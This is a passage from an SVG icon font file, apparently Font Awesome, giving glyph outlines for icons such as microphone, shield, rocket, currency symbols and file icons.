q0 22 -15 50.5t-33.5 53t-33.5 64.5t-15 83q0 82 59 127.5t144 45.5q80 0 134 -44.5t54 -123.5q0 -41 -17.5 -77.5t-38 -59t-38 -56.5t-17.5 -71q0 -57 42 -83.5t103 -26.5q64 0 180 15t163 17v-2q-1 -2 -3.5 -17.5t-5 -34t-3.5 -21.5q-24 -150 -24 -245q0 -80 35 -117
q44 -46 89 -46q22 0 50.5 15t53 33.5t64.5 33.5t83 15q82 0 127.5 -59t45.5 -143z" />
    <glyph glyph-name="microphone" unicode="&#xf130;" horiz-adv-x="1152" 
d="M1152 832v-128q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-217 24 -364.5 187.5t-147.5 384.5v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -185 131.5 -316.5t316.5 -131.5
t316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45zM896 1216v-512q0 -132 -94 -226t-226 -94t-226 94t-94 226v512q0 132 94 226t226 94t226 -94t94 -226z" />
    <glyph glyph-name="microphone_off" unicode="&#xf131;" horiz-adv-x="1408" 
d="M271 591l-101 -101q-42 103 -42 214v128q0 26 19 45t45 19t45 -19t19 -45v-128q0 -53 15 -113zM1385 1193l-361 -361v-128q0 -132 -94 -226t-226 -94q-55 0 -109 19l-96 -96q97 -51 205 -51q185 0 316.5 131.5t131.5 316.5v128q0 26 19 45t45 19t45 -19t19 -45v-128
q0 -221 -147.5 -384.5t-364.5 -187.5v-132h256q26 0 45 -19t19 -45t-19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h256v132q-125 13 -235 81l-254 -254q-10 -10 -23 -10t-23 10l-82 82q-10 10 -10 23t10 23l1234 1234q10 10 23 10t23 -10l82 -82q10 -10 10 -23
t-10 -23zM1005 1325l-621 -621v512q0 132 94 226t226 94q102 0 184.5 -59t116.5 -152z" />
    <glyph glyph-name="shield" unicode="&#xf132;" horiz-adv-x="1280" 
d="M1088 576v640h-448v-1137q119 63 213 137q235 184 235 360zM1280 1344v-768q0 -86 -33.5 -170.5t-83 -150t-118 -127.5t-126.5 -103t-121 -77.5t-89.5 -49.5t-42.5 -20q-12 -6 -26 -6t-26 6q-16 7 -42.5 20t-89.5 49.5t-121 77.5t-126.5 103t-118 127.5t-83 150
t-33.5 170.5v768q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
    <glyph glyph-name="calendar_empty" unicode="&#xf133;" horiz-adv-x="1664" 
d="M128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280
q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
    <glyph glyph-name="fire_extinguisher" unicode="&#xf134;" horiz-adv-x="1408" 
d="M512 1344q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 1376v-320q0 -16 -12 -25q-8 -7 -20 -7q-4 0 -7 1l-448 96q-11 2 -18 11t-7 20h-256v-102q111 -23 183.5 -111t72.5 -203v-800q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v800
q0 106 62.5 190.5t161.5 114.5v111h-32q-59 0 -115 -23.5t-91.5 -53t-66 -66.5t-40.5 -53.5t-14 -24.5q-17 -35 -57 -35q-16 0 -29 7q-23 12 -31.5 37t3.5 49q5 10 14.5 26t37.5 53.5t60.5 70t85 67t108.5 52.5q-25 42 -25 86q0 66 47 113t113 47t113 -47t47 -113
q0 -33 -14 -64h302q0 11 7 20t18 11l448 96q3 1 7 1q12 0 20 -7q12 -9 12 -25z" />
    <glyph glyph-name="rocket" unicode="&#xf135;" horiz-adv-x="1664" 
d="M1440 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1664 1376q0 -249 -75.5 -430.5t-253.5 -360.5q-81 -80 -195 -176l-20 -379q-2 -16 -16 -26l-384 -224q-7 -4 -16 -4q-12 0 -23 9l-64 64q-13 14 -8 32l85 276l-281 281l-276 -85q-3 -1 -9 -1
q-14 0 -23 9l-64 64q-17 19 -5 39l224 384q10 14 26 16l379 20q96 114 176 195q188 187 358 258t431 71q14 0 24 -9.5t10 -22.5z" />
    <glyph glyph-name="maxcdn" unicode="&#xf136;" horiz-adv-x="1792" 
d="M1745 763l-164 -763h-334l178 832q13 56 -15 88q-27 33 -83 33h-169l-204 -953h-334l204 953h-286l-204 -953h-334l204 953l-153 327h1276q101 0 189.5 -40.5t147.5 -113.5q60 -73 81 -168.5t0 -194.5z" />
    <glyph glyph-name="chevron_sign_left" unicode="&#xf137;" 
d="M909 141l102 102q19 19 19 45t-19 45l-307 307l307 307q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5
t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="chevron_sign_right" unicode="&#xf138;" 
d="M717 141l454 454q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l307 -307l-307 -307q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5
t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="chevron_sign_up" unicode="&#xf139;" 
d="M1165 397l102 102q19 19 19 45t-19 45l-454 454q-19 19 -45 19t-45 -19l-454 -454q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l307 307l307 -307q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5
t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="chevron_sign_down" unicode="&#xf13a;" 
d="M813 237l454 454q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-307 -307l-307 307q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l454 -454q19 -19 45 -19t45 19zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5
t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="html5" unicode="&#xf13b;" horiz-adv-x="1408" 
d="M1130 939l16 175h-884l47 -534h612l-22 -228l-197 -53l-196 53l-13 140h-175l22 -278l362 -100h4v1l359 99l50 544h-644l-15 181h674zM0 1408h1408l-128 -1438l-578 -162l-574 162z" />
    <glyph glyph-name="css3" unicode="&#xf13c;" horiz-adv-x="1792" 
d="M275 1408h1505l-266 -1333l-804 -267l-698 267l71 356h297l-29 -147l422 -161l486 161l68 339h-1208l58 297h1209l38 191h-1208z" />
    <glyph glyph-name="anchor" unicode="&#xf13d;" horiz-adv-x="1792" 
d="M960 1280q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1792 352v-352q0 -22 -20 -30q-8 -2 -12 -2q-12 0 -23 9l-93 93q-119 -143 -318.5 -226.5t-429.5 -83.5t-429.5 83.5t-318.5 226.5l-93 -93q-9 -9 -23 -9q-4 0 -12 2q-20 8 -20 30v352
q0 14 9 23t23 9h352q22 0 30 -20q8 -19 -7 -35l-100 -100q67 -91 189.5 -153.5t271.5 -82.5v647h-192q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h192v163q-58 34 -93 92.5t-35 128.5q0 106 75 181t181 75t181 -75t75 -181q0 -70 -35 -128.5t-93 -92.5v-163h192q26 0 45 -19
t19 -45v-128q0 -26 -19 -45t-45 -19h-192v-647q149 20 271.5 82.5t189.5 153.5l-100 100q-15 16 -7 35q8 20 30 20h352q14 0 23 -9t9 -23z" />
    <glyph glyph-name="unlock_alt" unicode="&#xf13e;" horiz-adv-x="1152" 
d="M1056 768q40 0 68 -28t28 -68v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v320q0 185 131.5 316.5t316.5 131.5t316.5 -131.5t131.5 -316.5q0 -26 -19 -45t-45 -19h-64q-26 0 -45 19t-19 45q0 106 -75 181t-181 75t-181 -75t-75 -181
v-320h736z" />
    <glyph glyph-name="bullseye" unicode="&#xf140;" 
d="M1024 640q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM1152 640q0 159 -112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM1280 640q0 -212 -150 -362t-362 -150t-362 150
t-150 362t150 362t362 150t362 -150t150 -362zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="ellipsis_horizontal" unicode="&#xf141;" horiz-adv-x="1408" 
d="M384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM896 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM1408 800v-192q0 -40 -28 -68t-68 -28h-192
q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
    <glyph glyph-name="ellipsis_vertical" unicode="&#xf142;" horiz-adv-x="384" 
d="M384 288v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 800v-192q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68zM384 1312v-192q0 -40 -28 -68t-68 -28h-192
q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h192q40 0 68 -28t28 -68z" />
    <glyph glyph-name="_303" unicode="&#xf143;" 
d="M512 256q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM863 162q-13 233 -176.5 396.5t-396.5 176.5q-14 1 -24 -9t-10 -23v-128q0 -13 8.5 -22t21.5 -10q154 -11 264 -121t121 -264q1 -13 10 -21.5t22 -8.5h128
q13 0 23 10t9 24zM1247 161q-5 154 -56 297.5t-139.5 260t-205 205t-260 139.5t-297.5 56q-14 1 -23 -9q-10 -10 -10 -23v-128q0 -13 9 -22t22 -10q204 -7 378 -111.5t278.5 -278.5t111.5 -378q1 -13 10 -22t22 -9h128q13 0 23 10q11 9 9 23zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="play_sign" unicode="&#xf144;" 
d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM1152 585q32 18 32 55t-32 55l-544 320q-31 19 -64 1q-32 -19 -32 -56v-640q0 -37 32 -56
q16 -8 32 -8q17 0 32 9z" />
    <glyph glyph-name="ticket" unicode="&#xf145;" horiz-adv-x="1792" 
d="M1024 1084l316 -316l-572 -572l-316 316zM813 105l618 618q19 19 19 45t-19 45l-362 362q-18 18 -45 18t-45 -18l-618 -618q-19 -19 -19 -45t19 -45l362 -362q18 -18 45 -18t45 18zM1702 742l-907 -908q-37 -37 -90.5 -37t-90.5 37l-126 126q56 56 56 136t-56 136
t-136 56t-136 -56l-125 126q-37 37 -37 90.5t37 90.5l907 906q37 37 90.5 37t90.5 -37l125 -125q-56 -56 -56 -136t56 -136t136 -56t136 56l126 -125q37 -37 37 -90.5t-37 -90.5z" />
    <glyph glyph-name="minus_sign_alt" unicode="&#xf146;" 
d="M1280 576v128q0 26 -19 45t-45 19h-896q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h896q26 0 45 19t19 45zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5
t84.5 -203.5z" />
    <glyph glyph-name="check_minus" unicode="&#xf147;" horiz-adv-x="1408" 
d="M1152 736v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h832q14 0 23 -9t9 -23zM1280 288v832q0 66 -47 113t-113 47h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113zM1408 1120v-832q0 -119 -84.5 -203.5
t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="level_up" unicode="&#xf148;" horiz-adv-x="1024" 
d="M1018 933q-18 -37 -58 -37h-192v-864q0 -14 -9 -23t-23 -9h-704q-21 0 -29 18q-8 20 4 35l160 192q9 11 25 11h320v640h-192q-40 0 -58 37q-17 37 9 68l320 384q18 22 49 22t49 -22l320 -384q27 -32 9 -68z" />
    <glyph glyph-name="level_down" unicode="&#xf149;" horiz-adv-x="1024" 
d="M32 1280h704q13 0 22.5 -9.5t9.5 -23.5v-863h192q40 0 58 -37t-9 -69l-320 -384q-18 -22 -49 -22t-49 22l-320 384q-26 31 -9 69q18 37 58 37h192v640h-320q-14 0 -25 11l-160 192q-13 14 -4 34q9 19 29 19z" />
    <glyph glyph-name="check_sign" unicode="&#xf14a;" 
d="M685 237l614 614q19 19 19 45t-19 45l-102 102q-19 19 -45 19t-45 -19l-467 -467l-211 211q-19 19 -45 19t-45 -19l-102 -102q-19 -19 -19 -45t19 -45l358 -358q19 -19 45 -19t45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5
t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="edit_sign" unicode="&#xf14b;" 
d="M404 428l152 -152l-52 -52h-56v96h-96v56zM818 818q14 -13 -3 -30l-291 -291q-17 -17 -30 -3q-14 13 3 30l291 291q17 17 30 3zM544 128l544 544l-288 288l-544 -544v-288h288zM1152 736l92 92q28 28 28 68t-28 68l-152 152q-28 28 -68 28t-68 -28l-92 -92zM1536 1120
v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_312" unicode="&#xf14c;" 
d="M1280 608v480q0 26 -19 45t-45 19h-480q-42 0 -59 -39q-17 -41 14 -70l144 -144l-534 -534q-19 -19 -19 -45t19 -45l102 -102q19 -19 45 -19t45 19l534 534l144 -144q18 -19 45 -19q12 0 25 5q39 17 39 59zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960
q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="share_sign" unicode="&#xf14d;" 
d="M1005 435l352 352q19 19 19 45t-19 45l-352 352q-30 31 -69 14q-40 -17 -40 -59v-160q-119 0 -216 -19.5t-162.5 -51t-114 -79t-76.5 -95.5t-44.5 -109t-21.5 -111.5t-5 -110.5q0 -181 167 -404q11 -12 25 -12q7 0 13 3q22 9 19 33q-44 354 62 473q46 52 130 75.5
t224 23.5v-160q0 -42 40 -59q12 -5 24 -5q26 0 45 19zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="compass" unicode="&#xf14e;" 
d="M640 448l256 128l-256 128v-256zM1024 1039v-542l-512 -256v542zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103
t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="collapse" unicode="&#xf150;" 
d="M1145 861q18 -35 -5 -66l-320 -448q-19 -27 -52 -27t-52 27l-320 448q-23 31 -5 66q17 35 57 35h640q40 0 57 -35zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120
v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="collapse_top" unicode="&#xf151;" 
d="M1145 419q-17 -35 -57 -35h-640q-40 0 -57 35q-18 35 5 66l320 448q19 27 52 27t52 -27l320 -448q23 -31 5 -66zM1280 160v960q0 13 -9.5 22.5t-22.5 9.5h-960q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h960q13 0 22.5 9.5t9.5 22.5zM1536 1120v-960
q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_317" unicode="&#xf152;" 
d="M1088 640q0 -33 -27 -52l-448 -320q-31 -23 -66 -5q-35 17 -35 57v640q0 40 35 57q35 18 66 -5l448 -320q27 -19 27 -52zM1280 160v960q0 14 -9 23t-23 9h-960q-14 0 -23 -9t-9 -23v-960q0 -14 9 -23t23 -9h960q14 0 23 9t9 23zM1536 1120v-960q0 -119 -84.5 -203.5
t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="eur" unicode="&#xf153;" horiz-adv-x="1024" 
d="M976 229l35 -159q3 -12 -3 -22.5t-17 -14.5l-5 -1q-4 -2 -10.5 -3.5t-16 -4.5t-21.5 -5.5t-25.5 -5t-30 -5t-33.5 -4.5t-36.5 -3t-38.5 -1q-234 0 -409 130.5t-238 351.5h-95q-13 0 -22.5 9.5t-9.5 22.5v113q0 13 9.5 22.5t22.5 9.5h66q-2 57 1 105h-67q-14 0 -23 9
t-9 23v114q0 14 9 23t23 9h98q67 210 243.5 338t400.5 128q102 0 194 -23q11 -3 20 -15q6 -11 3 -24l-43 -159q-3 -13 -14 -19.5t-24 -2.5l-4 1q-4 1 -11.5 2.5l-17.5 3.5t-22.5 3.5t-26 3t-29 2.5t-29.5 1q-126 0 -226 -64t-150 -176h468q16 0 25 -12q10 -12 7 -26
l-24 -114q-5 -26 -32 -26h-488q-3 -37 0 -105h459q15 0 25 -12q9 -12 6 -27l-24 -112q-2 -11 -11 -18.5t-20 -7.5h-387q48 -117 149.5 -185.5t228.5 -68.5q18 0 36 1.5t33.5 3.5t29.5 4.5t24.5 5t18.5 4.5l12 3l5 2q13 5 26 -2q12 -7 15 -21z" />
    <glyph glyph-name="gbp" unicode="&#xf154;" horiz-adv-x="1024" 
d="M1020 399v-367q0 -14 -9 -23t-23 -9h-956q-14 0 -23 9t-9 23v150q0 13 9.5 22.5t22.5 9.5h97v383h-95q-14 0 -23 9.5t-9 22.5v131q0 14 9 23t23 9h95v223q0 171 123.5 282t314.5 111q185 0 335 -125q9 -8 10 -20.5t-7 -22.5l-103 -127q-9 -11 -22 -12q-13 -2 -23 7
q-5 5 -26 19t-69 32t-93 18q-85 0 -137 -47t-52 -123v-215h305q13 0 22.5 -9t9.5 -23v-131q0 -13 -9.5 -22.5t-22.5 -9.5h-305v-379h414v181q0 13 9 22.5t23 9.5h162q14 0 23 -9.5t9 -22.5z" />
    <glyph glyph-name="usd" unicode="&#xf155;" horiz-adv-x="1024" 
d="M978 351q0 -153 -99.5 -263.5t-258.5 -136.5v-175q0 -14 -9 -23t-23 -9h-135q-13 0 -22.5 9.5t-9.5 22.5v175q-66 9 -127.5 31t-101.5 44.5t-74 48t-46.5 37.5t-17.5 18q-17 21 -2 41l103 135q7 10 23 12q15 2 24 -9l2 -2q113 -99 243 -125q37 -8 74 -8q81 0 142.5 43
t61.5 122q0 28 -15 53t-33.5 42t-58.5 37.5t-66 32t-80 32.5q-39 16 -61.5 25t-61.5 26.5t-62.5 31t-56.5 35.5t-53.5 42.5t-43.5 49t-35.5 58t-21 66.5t-8.5 78q0 138 98 242t255 134v180q0 13 9.5 22.5t22.5 9.5h135q14 0 23 -9t9 -23v-176q57 -6 110.5 -23t87 -33.5
t63.5 -37.5t39 -29t15 -14q17 -18 5 -38l-81 -146q-8 -15 -23 -16q-14 -3 -27 7q-3 3 -14.5 12t-39 26.5t-58.5 32t-74.5 26t-85.5 11.5q-95 0 -155 -43t-60 -111q0 -26 8.5 -48t29.5 -41.5t39.5 -33t56 -31t60.5 -27t70 -27.5q53 -20 81 -31.5t76 -35t75.5 -42.5t62 -50
t53 -63.5t31.5 -76.5t13 -94z" />
    <glyph glyph-name="inr" unicode="&#xf156;" horiz-adv-x="898" 
d="M898 1066v-102q0 -14 -9 -23t-23 -9h-168q-23 -144 -129 -234t-276 -110q167 -178 459 -536q14 -16 4 -34q-8 -18 -29 -18h-195q-16 0 -25 12q-306 367 -498 571q-9 9 -9 22v127q0 13 9.5 22.5t22.5 9.5h112q132 0 212.5 43t102.5 125h-427q-14 0 -23 9t-9 23v102
q0 14 9 23t23 9h413q-57 113 -268 113h-145q-13 0 -22.5 9.5t-9.5 22.5v133q0 14 9 23t23 9h832q14 0 23 -9t9 -23v-102q0 -14 -9 -23t-23 -9h-233q47 -61 64 -144h171q14 0 23 -9t9 -23z" />
    <glyph glyph-name="jpy" unicode="&#xf157;" horiz-adv-x="1027" 
d="M603 0h-172q-13 0 -22.5 9t-9.5 23v330h-288q-13 0 -22.5 9t-9.5 23v103q0 13 9.5 22.5t22.5 9.5h288v85h-288q-13 0 -22.5 9t-9.5 23v104q0 13 9.5 22.5t22.5 9.5h214l-321 578q-8 16 0 32q10 16 28 16h194q19 0 29 -18l215 -425q19 -38 56 -125q10 24 30.5 68t27.5 61
l191 420q8 19 29 19h191q17 0 27 -16q9 -14 1 -31l-313 -579h215q13 0 22.5 -9.5t9.5 -22.5v-104q0 -14 -9.5 -23t-22.5 -9h-290v-85h290q13 0 22.5 -9.5t9.5 -22.5v-103q0 -14 -9.5 -23t-22.5 -9h-290v-330q0 -13 -9.5 -22.5t-22.5 -9.5z" />
    <glyph glyph-name="rub" unicode="&#xf158;" horiz-adv-x="1280" 
d="M1043 971q0 100 -65 162t-171 62h-320v-448h320q106 0 171 62t65 162zM1280 971q0 -193 -126.5 -315t-326.5 -122h-340v-118h505q14 0 23 -9t9 -23v-128q0 -14 -9 -23t-23 -9h-505v-192q0 -14 -9.5 -23t-22.5 -9h-167q-14 0 -23 9t-9 23v192h-224q-14 0 -23 9t-9 23v128
q0 14 9 23t23 9h224v118h-224q-14 0 -23 9t-9 23v149q0 13 9 22.5t23 9.5h224v629q0 14 9 23t23 9h539q200 0 326.5 -122t126.5 -315z" />
    <glyph glyph-name="krw" unicode="&#xf159;" horiz-adv-x="1792" 
d="M514 341l81 299h-159l75 -300q1 -1 1 -3t1 -3q0 1 0.5 3.5t0.5 3.5zM630 768l35 128h-292l32 -128h225zM822 768h139l-35 128h-70zM1271 340l78 300h-162l81 -299q0 -1 0.5 -3.5t1.5 -3.5q0 1 0.5 3t0.5 3zM1382 768l33 128h-297l34 -128h230zM1792 736v-64q0 -14 -9 -23
t-23 -9h-213l-164 -616q-7 -24 -31 -24h-159q-24 0 -31 24l-166 616h-209l-167 -616q-7 -24 -31 -24h-159q-11 0 -19.5 7t-10.5 17l-160 616h-208q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h175l-33 128h-142q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h109l-89 344q-5 15 5 28
q10 12 26 12h137q26 0 31 -24l90 -360h359l97 360q7 24 31 24h126q24 0 31 -24l98 -360h365l93 360q5 24 31 24h137q16 0 26 -12q10 -13 5 -28l-91 -344h111q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-145l-34 -128h179q14 0 23 -9t9 -23z" />
    <glyph glyph-name="btc" unicode="&#xf15a;" horiz-adv-x="1280" 
d="M1167 896q18 -182 -131 -258q117 -28 175 -103t45 -214q-7 -71 -32.5 -125t-64.5 -89t-97 -58.5t-121.5 -34.5t-145.5 -15v-255h-154v251q-80 0 -122 1v-252h-154v255q-18 0 -54 0.5t-55 0.5h-200l31 183h111q50 0 58 51v402h16q-6 1 -16 1v287q-13 68 -89 68h-111v164
l212 -1q64 0 97 1v252h154v-247q82 2 122 2v245h154v-252q79 -7 140 -22.5t113 -45t82.5 -78t36.5 -114.5zM952 351q0 36 -15 64t-37 46t-57.5 30.5t-65.5 18.5t-74 9t-69 3t-64.5 -1t-47.5 -1v-338q8 0 37 -0.5t48 -0.5t53 1.5t58.5 4t57 8.5t55.5 14t47.5 21t39.5 30
t24.5 40t9.5 51zM881 827q0 33 -12.5 58.5t-30.5 42t-48 28t-55 16.5t-61.5 8t-58 2.5t-54 -1t-39.5 -0.5v-307q5 0 34.5 -0.5t46.5 0t50 2t55 5.5t51.5 11t48.5 18.5t37 27t27 38.5t9 51z" />
    <glyph glyph-name="file" unicode="&#xf15b;" 
d="M1024 1024v472q22 -14 36 -28l408 -408q14 -14 28 -36h-472zM896 992q0 -40 28 -68t68 -28h544v-1056q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h800v-544z" />
    <glyph glyph-name="file_text" unicode="&#xf15c;" 
d="M1468 1060q14 -14 28 -36h-472v472q22 -14 36 -28zM992 896h544v-1056q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h800v-544q0 -40 28 -68t68 -28zM1152 160v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704
q14 0 23 9t9 23zM1152 416v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23zM1152 672v64q0 14 -9 23t-23 9h-704q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h704q14 0 23 9t9 23z" />
    <glyph glyph-name="sort_by_alphabet" unicode="&#xf15d;" horiz-adv-x="1664" 
d="M1191 1128h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1572 -23
v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -11v-2l14 2q9 2 30 2h248v119h121zM1661 874v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162
l230 -662h70z" />
    <glyph glyph-name="_329" unicode="&#xf15e;" horiz-adv-x="1664" 
d="M1191 104h177l-72 218l-12 47q-2 16 -2 20h-4l-3 -20q0 -1 -3.5 -18t-7.5 -29zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1661 -150
v-106h-288v106h75l-47 144h-243l-47 -144h75v-106h-287v106h70l230 662h162l230 -662h70zM1572 1001v-233h-584v90l369 529q12 18 21 27l11 9v3q-2 0 -6.5 -0.5t-7.5 -0.5q-12 -3 -30 -3h-232v-115h-120v229h567v-89l-369 -530q-6 -8 -21 -26l-11 -10v-3l14 3q9 1 30 1h248
v119h121z" />
    <glyph glyph-name="sort_by_attributes" unicode="&#xf160;" horiz-adv-x="1792" 
